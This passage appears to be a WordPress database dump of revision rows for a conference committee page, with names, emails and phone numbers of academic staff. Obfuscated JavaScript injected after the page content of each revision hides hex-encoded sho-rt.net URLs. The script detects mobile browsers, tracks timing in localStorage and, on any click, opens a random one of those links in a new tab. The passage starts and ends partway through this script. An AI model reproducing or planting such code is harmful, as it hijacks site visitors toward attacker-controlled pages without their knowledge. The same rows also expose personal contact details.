)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:05:18','2023-06-27 09:05:18','',4849,'https://gsw2023.com/?p=4881',0,'revision','',0),
(4882,4,'2023-06-27 09:06:23','2023-06-27 09:06:23','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:06:23','2023-06-27 09:06:23','',4849,'https://gsw2023.com/?p=4882',0,'revision','',0),
(4883,4,'2023-06-27 09:39:49','2023-06-27 09:39:49','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858431751{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 14pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">E-mail : nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">Mobile &amp; WhatsApp: +20 1005201630</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 